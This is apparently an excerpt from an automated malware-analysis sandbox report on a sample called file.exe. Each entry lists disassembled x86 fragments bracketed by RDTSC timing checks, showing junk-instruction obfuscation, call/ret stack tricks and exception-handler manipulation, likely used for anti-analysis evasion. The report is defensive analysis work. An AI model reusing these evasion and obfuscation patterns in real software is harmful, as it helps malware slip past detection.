Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D6DC6 second address: 8D6DDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F6D18BC6CB8h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D6DDB second address: 8D6DE1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D8F33 second address: 8D8F37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D8F37 second address: 8D8F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D8C8A second address: 8D8C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DDE73 second address: 8DDE79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DDE79 second address: 8DDE7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DE3DF second address: 8DE3E9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6D19596916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DE3E9 second address: 8DE3F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F6D18BC6CB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DE3F3 second address: 8DE418 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6D19596916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6D19596925h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DE5E0 second address: 8DE5E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DF790 second address: 8DF7FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jng 00007F6D19596916h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 sub dword ptr [ebp+122D1EAFh], ebx 0x00000017 mov dword ptr [ebp+1247A6B8h], ecx 0x0000001d push dword ptr fs:[00000000h] 0x00000024 push 00000000h 0x00000026 push edi 0x00000027 call 00007F6D19596918h 0x0000002c pop edi 0x0000002d mov dword ptr [esp+04h], edi 0x00000031 add dword ptr [esp+04h], 00000018h 0x00000039 inc edi 0x0000003a push edi 0x0000003b ret 0x0000003c pop edi 0x0000003d ret 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 push edx 0x00000046 add dword ptr [ebp+122D27D3h], ebx 0x0000004c pop edi 0x0000004d mov eax, dword ptr [ebp+122D14C1h] 0x00000053 sub dword ptr [ebp+122D323Ch], eax 0x00000059 push FFFFFFFFh 0x0000005b mov dword ptr [ebp+122D2784h], ecx 0x00000061 cmc 0x00000062 nop 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 popad 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E06FB second address: 8E0701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DE5E5 second address: 8DE666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jl 00007F6D19596916h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F6D19596918h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 push dword ptr fs:[00000000h] 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007F6D19596918h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a jo 00007F6D19596917h 0x00000050 stc 0x00000051 mov dword ptr fs:[00000000h], esp 0x00000058 mov ebx, dword ptr [ebp+122D2CDAh] 0x0000005e mov dword ptr [ebp+122D1FD9h], edx 0x00000064 mov eax, dword ptr [ebp+122D09A9h] 0x0000006a mov edi, esi 0x0000006c push FFFFFFFFh 0x0000006e add bl, FFFFFFDDh 0x00000071 nop 0x00000072 pushad 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DF7FF second address: 8DF80F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CBCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E0701 second address: 8E0705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DE666 second address: 8DE66E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DF80F second address: 8DF82C instructions: 0x00000000 rdtsc 0x00000002 js 00007F6D19596918h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jmp 00007F6D1959691Ch 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E0705 second address: 8E072F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e je 00007F6D18BC6CB6h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DE66E second address: 8DE686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6D1959691Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E072F second address: 8E0733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DE686 second address: 8DE68C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E0733 second address: 8E07A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F6D18BC6CB8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov ebx, edx 0x00000024 push 00000000h 0x00000026 jnl 00007F6D18BC6CC0h 0x0000002c movsx ebx, ax 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007F6D18BC6CB8h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 00000019h 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b xchg eax, esi 0x0000004c push esi 0x0000004d push edx 0x0000004e push ebx 0x0000004f pop ebx 0x00000050 pop edx 0x00000051 pop esi 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E07A4 second address: 8E07A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E097B second address: 8E0981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E0981 second address: 8E09A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D19596922h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F6D19596916h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E1916 second address: 8E1920 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F6D18BC6CB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E295E second address: 8E2971 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D1959691Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E1920 second address: 8E19A2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jno 00007F6D18BC6CB8h 0x00000011 mov ebx, dword ptr [ebp+122D24ADh] 0x00000017 push dword ptr fs:[00000000h] 0x0000001e mov bl, ch 0x00000020 stc 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 sub dword ptr [ebp+12479770h], esi 0x0000002e mov eax, dword ptr [ebp+122D09C5h] 0x00000034 push 00000000h 0x00000036 push ebx 0x00000037 call 00007F6D18BC6CB8h 0x0000003c pop ebx 0x0000003d mov dword ptr [esp+04h], ebx 0x00000041 add dword ptr [esp+04h], 00000014h 0x00000049 inc ebx 0x0000004a push ebx 0x0000004b ret 0x0000004c pop ebx 0x0000004d ret 0x0000004e clc 0x0000004f push FFFFFFFFh 0x00000051 sub dword ptr [ebp+122D388Eh], eax 0x00000057 nop 0x00000058 jo 00007F6D18BC6CC4h 0x0000005e jmp 00007F6D18BC6CBEh 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007F6D18BC6CBFh 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E5137 second address: 8E513B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E5FD7 second address: 8E5FDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E6104 second address: 8E610E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F6D19596916h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E61F1 second address: 8E61F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E61F5 second address: 8E61F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E9483 second address: 8E948F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EC554 second address: 8EC5D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b or bx, D640h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F6D19596918h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c mov edi, dword ptr [ebp+122D2B6Ah] 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edx 0x00000037 call 00007F6D19596918h 0x0000003c pop edx 0x0000003d mov dword ptr [esp+04h], edx 0x00000041 add dword ptr [esp+04h], 0000001Bh 0x00000049 inc edx 0x0000004a push edx 0x0000004b ret 0x0000004c pop edx 0x0000004d ret 0x0000004e mov ebx, 5289FED4h 0x00000053 xchg eax, esi 0x00000054 push esi 0x00000055 push esi 0x00000056 js 00007F6D19596916h 0x0000005c pop esi 0x0000005d pop esi 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F6D19596922h 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EB6C7 second address: 8EB6CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EB78E second address: 8EB795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EC756 second address: 8EC77A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F6D18BC6CC2h 0x00000010 jnl 00007F6D18BC6CB6h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EED45 second address: 8EED4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EFD09 second address: 8EFD0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F094E second address: 8F0952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EFD0D second address: 8EFD11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F18D8 second address: 8F18E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F6D19596916h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F18E2 second address: 8F18E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F9935 second address: 8F9939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F9939 second address: 8F994F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6D18BC6CC0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F9156 second address: 8F9161 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F6D19596916h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FE628 second address: 8FE62C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 900FB7 second address: 900FC9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6D19596918h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 900FC9 second address: 900FCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 900FCD second address: 900FE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6D1959691Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 900FE9 second address: 900FFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9011BF second address: 9011C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9011C3 second address: 9011DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9011DB second address: 901217 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6D1959692Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6D19596928h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 901217 second address: 90124F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6D18BC6CBFh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f jns 00007F6D18BC6CC2h 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push esi 0x0000001a jl 00007F6D18BC6CBCh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9012E7 second address: 71EB20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F6D19596926h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 682C7EA7h 0x00000012 jc 00007F6D1959691Eh 0x00000018 js 00007F6D19596918h 0x0000001e push dword ptr [ebp+122D055Dh] 0x00000024 cld 0x00000025 call dword ptr [ebp+122D37D9h] 0x0000002b pushad 0x0000002c xor dword ptr [ebp+122D23F2h], esi 0x00000032 xor eax, eax 0x00000034 xor dword ptr [ebp+122D23F2h], edi 0x0000003a mov edx, dword ptr [esp+28h] 0x0000003e jp 00007F6D19596922h 0x00000044 jmp 00007F6D1959691Ch 0x00000049 mov dword ptr [ebp+122D2B16h], eax 0x0000004f clc 0x00000050 je 00007F6D1959691Ch 0x00000056 mov dword ptr [ebp+122D23F2h], edx 0x0000005c mov esi, 0000003Ch 0x00000061 pushad 0x00000062 mov edx, dword ptr [ebp+122D2C1Ah] 0x00000068 mov dword ptr [ebp+122D36FEh], edi 0x0000006e popad 0x0000006f add esi, dword ptr [esp+24h] 0x00000073 sub dword ptr [ebp+122D1CD6h], ebx 0x00000079 lodsw 0x0000007b mov dword ptr [ebp+122D23F2h], edx 0x00000081 add eax, dword ptr [esp+24h] 0x00000085 jmp 00007F6D19596921h 0x0000008a mov ebx, dword ptr [esp+24h] 0x0000008e pushad 0x0000008f mov dword ptr [ebp+122D36FEh], edi 0x00000095 mov dword ptr [ebp+122D36FEh], eax 0x0000009b popad 0x0000009c nop 0x0000009d push esi 0x0000009e pushad 0x0000009f push edi 0x000000a0 pop edi 0x000000a1 push eax 0x000000a2 push edx 0x000000a3 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 904F5E second address: 904F77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6D18BC6CC4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 904F77 second address: 904F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F6D1959691Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 905218 second address: 90521C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90521C second address: 905220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9054EB second address: 905506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6D18BC6CBBh 0x00000009 jnl 00007F6D18BC6CBCh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 909F9B second address: 909FA1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90A0F9 second address: 90A115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F6D18BC6CC4h 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90A115 second address: 90A119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90A119 second address: 90A126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90A126 second address: 90A12A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90A12A second address: 90A134 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6D18BC6CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90A134 second address: 90A13E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F6D19596916h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90A2EB second address: 90A30C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnp 00007F6D18BC6CB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007F6D18BC6CBDh 0x00000012 jc 00007F6D18BC6CB6h 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90A30C second address: 90A311 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90A746 second address: 90A74B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90A74B second address: 90A783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jnl 00007F6D19596916h 0x00000013 je 00007F6D19596916h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c jmp 00007F6D1959691Fh 0x00000021 pushad 0x00000022 js 00007F6D19596916h 0x00000028 push ecx 0x00000029 pop ecx 0x0000002a push edi 0x0000002b pop edi 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90A8FE second address: 90A902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90A902 second address: 90A908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90AA69 second address: 90AA73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90AA73 second address: 90AA79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90AC17 second address: 90AC1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B9457 second address: 8B945B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90B1AC second address: 90B1B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90B1B0 second address: 90B1B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
